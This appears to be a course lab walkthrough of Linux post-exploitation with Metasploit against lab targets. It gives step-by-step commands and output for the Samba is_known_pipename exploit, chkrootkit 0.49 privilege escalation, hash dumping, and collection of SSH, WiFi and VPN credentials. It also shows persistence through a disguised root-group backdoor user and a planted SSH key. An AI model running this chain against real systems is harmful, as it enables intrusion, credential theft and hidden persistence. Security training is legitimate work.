🔬Linux Post Exploitation - MSF

Lab 1

🔬 Post Exploitation Lab I
Target IP: 192.215.55.3
Metasploit post/linux/gather/ modules

ip -br -c a
	eth1@if165838 UP 192.215.55.2/24

service postgresql start && msfconsole -q

db_status
setg RHOSTS 192.215.55.3
setg RHOST 192.215.55.3
workspace -a Linux_PostExp

Perform an nmap scan directly into MSF

db_nmap -sV 192.215.55.3

139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

Exploitation

search type:exploit name:samba
use exploit/linux/samba/is_known_pipename
options
run

pwd
	/tmp

# CTRL + Z to background the shell
sessions

Upgrade the shell cmd/unix sessions to a Meterpreter session

sessions -u 1
sessions 2

Some local enumeration

sysinfo
    Computer     : 192.215.55.3
    OS           : Debian 8.11 (Linux 5.4.0-131-generic)
    Architecture : x64
    BuildTuple   : i486-linux-musl
    Meterpreter  : x86/linux
getuid
	Server username: uid=0, gid=0, euid=0, egid=0
	# "root" user Meterpreter session

shell

/bin/bash -i
whoami

# Enumerate Users
cat /etc/passwd

groups root

cat /etc/*issue

cat /etc/*release

uname -a

# Network Enumeration
netstat -antp

# if not working
ss -tnl

 State Recv-Q Send-Q Local Address:Port Peer Address:Port 
 LISTEN 0      50 				 *:445 		*:*     
 LISTEN 0      4096 	127.0.0.11:39389 	*:*     
 LISTEN 0      50 				 *:139 		*:*     
 LISTEN 0      50 				:::445 	   :::*     
 LISTEN 0      50 				:::139 	   :::*

# List processes
ps aux

# Enumerate environment variables
env

Some Post Exploitation

Enumerate apps and services configuration files

exit
# if the session dies, open a new one
sessions -u 1

search enum_configs
use post/linux/gather/enum_configs
info
# Description:
#   This module collects configuration files found on commonly installed 
#   applications and services, such as Apache, MySQL, Samba, Sendmail, 
#   etc. If a config file is found in its default path, the module will 
#   assume that is the file we want.
sessions
# Set the Meterpreter session
set SESSION 4
run

# It will not migrate if it's already a x64 process

loot
# Check the enumerated configuration files

Enumerate system environment variables

search env platform:linux
use post/multi/gather/env
info
# Description:
#   This module prints out the operating system environment variables
sessions
set SESSION 3
run

Enumerate network information

search enum_network
use post/linux/gather/enum_network
info
# Description:
#   This module gathers network information from the target system 
#   IPTables rules, interfaces, wireless information, open and listening 
#   ports, active network connections, DNS information and SSH 
#   information.
set SESSION 3
run

loot
cat /root/.msf4/loot/20230422104739_Linux_PostExp_192.215.55.3_linux.enum.netwo_707609.txt

    search members.linode.com
    nameserver 127.0.0.11
    options edns0 trust-ad ndots:0

Check for protection/security systems

search enum_protections
use post/linux/gather/enum_protections
info
# Description:
#   This module checks whether popular system hardening mechanisms are 
#   in place, such as SMEP, SMAP, SELinux, PaX and grsecurity. It also 
#   tries to find installed applications that can be used to hinder, 
#   prevent, or detect attacks, such as tripwire, snort, and apparmor. 
#   This module is meant to identify Linux Secure Modules (LSM) in 
#   addition to various antivirus, IDS/IPS, firewalls, sandboxes and 
#   other security related software.
set SESSION 3
run

notes
# check above information stored within the MSFdb

Enumerate the system

search enum_system
use post/linux/gather/enum_system
info
# Description:
#   This module gathers system information. We collect installed 
#   packages, installed services, mount information, user list, user 
#   bash history and cron jobs
set SESSION 3
run

loot
# Check the installed packages on the O.S.

cat /root/.msf4/loot/20230422105452_Linux_PostExp_192.215.55.3_linux.enum.syste_557868.txt

Check if the target is a VM or a container

search checkcontainer
use post/linux/gather/checkcontainer
# Description:
#   This module attempts to determine whether the system is running 
#   inside of a container and if so, which one. This module supports 
#   detection of Docker, LXC, and systemd nspawn.
set SESSION 3
run
	[+] This appears to be a 'Docker' container

📌 A Docker container can be exploited to break out of it and gain access to the host system.

Enumerate VM

search checkvm
use post/linux/gather/checkvm
set SESSION 3
run
# The target is not a VM

Enumerate users history

search enum_users_history
use post/linux/gather/enum_users_history
# Description:
#   This module gathers the following user-specific information: shell 
#   history, MySQL history, PostgreSQL history, MongoDB history, Vim 
#   history, lastlog, and sudoers.
set SESSION 3
run

# If this doesn't work, migrate to a "NT AUTHORITY\SYSTEM" user service

loot
cat /root/.msf4/loot/20230422110345_Linux_PostExp_192.215.55.3_linux.enum.users_227379.txt

    whoami
    cat /etc/passwd
    cat /etc/*issue
    cat /etc/*release
    uname -a
    ip a s
    netstat -antp
    ss -tnl
    ps aux
    env

Lab 2 - Privilege Escalation

🔬 Privilege Escalation - Rootkit Scanner
Target IP: 192.15.244.3
Exploit a vulnerable Rootkit Scanner and escalate privileges to root user
Chkrootkit 0.49 - Local Privilege Escalation
SSH Credentials: jackie:password

ip -br -c a
	192.15.244.2/24
service postgresql start && msfconsole -q

db_status
setg RHOSTS 192.15.244.3
setg RHOST 192.15.244.3
workspace -a Linux_Privesc

Perform an nmap scan directly into MSF

db_nmap -sV 192.15.244.3

22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

Exploitation - SSH

search ssh_login
use auxiliary/scanner/ssh/ssh_login
options
set USERNAME jackie
set PASSWORD password
run

sessions
	1 shell unknown  SSH jackie:password (192.15.244.3:22)
sessions 1
/bin/bash -i
pwd
	/home/jackie
whoami
	jackie

cat /etc/*issue
	Ubuntu 18.04.3 LTS \n \l
uname -r

# CTRL+Z

sessions -u 1
sessions
sessions 2

sysinfo
    Computer     : 192.15.244.3
    OS           : Ubuntu 18.04 (Linux 5.4.0-131-generic)
    Architecture : x64
    BuildTuple   : i486-linux-musl
    Meterpreter  : x86/linux
getuid
	Server username: no-user @ victim-1 (uid=1000, gid=1000, euid=1000, egid=1000)

shell
/bin/bash -i
cat /etc/passwd

ps aux

Investigate the /bin/check-down binary

cat /bin/check-down

    #!/bin/bash
    while :
    do
            /usr/local/bin/chkrootkit/chkrootkit -x > /dev/null 2>&1
            sleep 60
    done

📌 The /usr/local/bin/chkrootkit/chkrootkit binary is executed every 60 seconds.
chkrootkit - locally checks for signs of a rootkit
Chkrootkit < 0.50 is vulnerable to local privilege escalation vulnerability

Check chkrootkit version

chkrootkit -V
	chkrootkit version 0.49

Background both the shell and the meterpreter session with CTRL+Z

Privilege Escalation

The technique will depend on the version of the target Linux Kernel and the distribution version.
- It is necessary to manually enumerate a privesc vulnerable program, Chkrootkit v.0.49 in this case

search chkrootkit
use exploit/unix/local/chkrootkit
info
# Description:
#   Chkrootkit before 0.50 will run any executable file named 
#   /tmp/update as root, allowing a trivial privilege escalation. 
#   WfsDelay is set to 24h, since this is how often a chkrootkit scan is 
#   scheduled by default.
set CHKROOTKIT /bin/chkrootkit
set SESSION 2
set LHOST 192.15.244.2
sessions # check the used ports
run

/bin/bash -i
ls
cat flag

Reveal Flag: 🚩

9db8bf8f483ff50857f26f9bd636bed6

Lab 3 - Dumping Hashes

🔬 Post Exploitation Lab II
Target IP: 192.252.196.3
Metasploit post/linux/gather/ credentials dumping modules

service postgresql start && msfconsole -q

db_status
setg RHOSTS 192.252.196.3
setg RHOST 192.252.196.3
workspace -a Linux_PostExp
db_nmap -sV 192.252.196.3

139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

Exploitation

search type:exploit name:samba
use exploit/linux/samba/is_known_pipename
options
run

pwd
	/tmp

# CTRL + Z to background the shell
sessions

Upgrade the shell cmd/unix sessions to a Meterpreter session

sessions -u 1
sessions 2

getuid
	Server username: uid=0, gid=0, euid=0, egid=0
	# "root" user Meterpreter session

Linux user account hashes can be dumped using the privileged root user.
Terminate the shell session and background the meterpreter session.

Hashdump

📌 Linux password hashes are stored in the /etc/shadow file, accessible only by a user with root privileges.
In newer Linux, the hashed passwords are stored in the /etc/shadow file. In turn, the hashed password field in the /etc/passwd file is filled with the x character. /etc/passwd is readable by all the users.
Linux users' passphrases are hashed using the crypt function. The hashed passphrase follows a specific format: $id$salt$hashedpassword
Methods Used by Linux for Hashing Passwords

post/linux/gather/hashdump module need to be run manually to dump the user account hashes and unshadow them
- A hash can be cracked (with John the Ripper) or stored for later use

search hashdump
use post/linux/gather/hashdump
info
# Description:
#   Post Module to dump the password hashes for all users on a Linux 
#   System
set SESSION 2
run

Some Post Exploitation

Enumerate ssh directories

search ssh_creds
use post/multi/gather/ssh_creds
info
# Description:
#   This module will collect the contents of all users' .ssh directories 
#   on the targeted machine. Additionally, known_hosts and 
#   authorized_keys and any other files are also downloaded. This module 
#   is largely based on firefox_creds.rb.
sessions
# Set the Meterpreter session
set SESSION 2
run

Enumerate users' .ecrypts directories

search ecryptfs_creds
use post/linux/gather/ecryptfs_creds
info
# Description:
#   This module will collect the contents of all users' .ecrypts 
#   directories on the targeted machine. Collected "wrapped-passphrase" 
#   files can be cracked with John the Ripper (JtR) to recover "mount 
#   passphrases".
sessions
set SESSION 2
run

Enumerate WiFi credentials

search enum_psk
use post/linux/gather/enum_psk
info
# Description:
#   This module collects 802-11-Wireless-Security credentials such as 
#   Access-Point name and Pre-Shared-Key from your target CLIENT Linux 
#   machine using /etc/NetworkManager/system-connections/ files. The 
#   module gathers NetworkManager's plaintext "psk" information.
set SESSION 2
run

Check for PPTP VPN chap-secrets credentials

search pptpd_chap_secrets
use post/linux/gather/pptpd_chap_secrets
info
# Description:
#   This module collects PPTP VPN information such as client, server, 
#   password, and IP from your target server's chap-secrets file.
set SESSION 2
run

Perform SSH Persistence

search sshkey
use post/linux/manage/sshkey_persistence
info
# Description:
#   This module will add an SSH key to a specified user (or all), to 
#   allow remote login via SSH at any time.
set SESSION 2
run

Lab 3 - Persistence

🔬 Same as Privilege Escalation - Rootkit Scanner
Target IP: 192.101.97.3
Metasploit post/linux/gather/ credentials dumping modules

ip -br -c a
	192.101.97.2/24
service postgresql start && msfconsole -q

db_status
setg RHOSTS 192.101.97.3
setg RHOST 192.101.97.3
workspace -a Linux_Persistence
db_nmap -sV 192.101.97.3

22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

Exploitation

search ssh_login
use auxiliary/scanner/ssh/ssh_login
options
set USERNAME jackie
set PASSWORD password
run
sessions

Upgrade the shell cmd/unix sessions to a Meterpreter session

sessions -u 1

Privilege Escalation

search chkrootkit
use exploit/unix/local/chkrootkit
set CHKROOTKIT /bin/chkrootkit
set SESSION 2
set LHOST 192.101.97.2
run

# CTRL+Z to background the shell session

Upgrade the privileged session 3 to a Meterpreter session

sessions -u 3
sessions 4

SESSION 4 is a Meterpreter privileged session

Persistence

Create a backdoor user with administrative privileges that can be used to access the target system via SSH

shell
whoami
	root
cat /etc/passwd
# Create a user that looks like a service account
# and add it to "root group"
useradd -m ftp -s /bin/bash
passwd ftp
	password123
usermod -aG root ftp
usermod -u 15 ftp
groups ftp
	ftp : ftp root

❗ Changing user's password is a strong indicator of compromise, it should not be done.

Perform SSH Persistence with a Metasploit persistence modules

exit # CTRL+C
background

search platform:linux persistence
use post/linux/manage/sshkey_persistence
info
# Description:
#   This module will add an SSH key to a specified user (or all), to 
#   allow remote login via SSH at any time.
set SESSION 4
set CREATESSHFOLDER true
run

Access the private key and copy the content of the id_rsa file and save it as a new file. Assign the appropriate permissions to the file

loot
cat /root/.msf4/loot/20230422145422_Linux_Persistenc_192.101.97.3_id_rsa_460359.txt

Exit the msfconsole with command exit -y. All the sessions will be closed.

vim ssh_key

# Add the private key, save and exit vim --> :wq

chmod 0400 ssh_key

Authenticate to the target with the private key

ssh -i ssh_key root@192.101.97.3

Previous🔬Win Post Exploitation - MSF NextExploitation

Last updated 1 year ago